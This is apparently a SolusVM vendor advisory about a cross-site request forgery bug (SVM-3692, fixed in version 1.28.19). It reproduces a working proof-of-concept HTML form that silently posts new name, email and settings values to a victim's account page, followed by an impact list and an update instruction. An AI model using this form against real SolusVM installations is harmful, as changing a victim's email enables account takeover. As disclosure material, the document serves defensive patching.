Applicable to:
- SolusVM
Situation
Using the *.html code given below it is possible to change user details.
CONFIG_TEXT: <html>
<body>
<form method="POST" action="https://10.67.89.116/account.php">
<input type="hidden" name="firstname" value="custom_first_name"/>
<input type="hidden" name="lastname" value="custom_lastname_name"/>
<input type="hidden" name="emailaddress" value="custom@mail"/>
<input type="hidden" name="company" value=""/>
<input type="hidden" name="language" value="English"/>
<input type="hidden" name="loginalert" value="on"/>
<input type="hidden" name="updatesettings" value="Update+Settings"/>
<input type="submit" value="Submit">
</form>
</body>
<html>
Impact
Personal information theft: The attacker can gain access to the victim's personal information, such as name, email address, and sensitive financial information.
Reputation damage: The attacker may use the victim's account to perform malicious actions, such as sending spam emails, posting inappropriate content, or making unauthorized purchases. This can result in damage to the victim's reputation and their relationship with the targeted website.
Financial loss: If the attacker is able to make unauthorized purchases or access the victim's financial information, they may be able to cause financial losses for the victim.
Call to action
This is the bug with ID #SVM-3692 which was fixed in SolusVM version 1.28.19
Update SolusVM to the latest mainline version.
Comments
0 comments
Please sign in to leave a comment.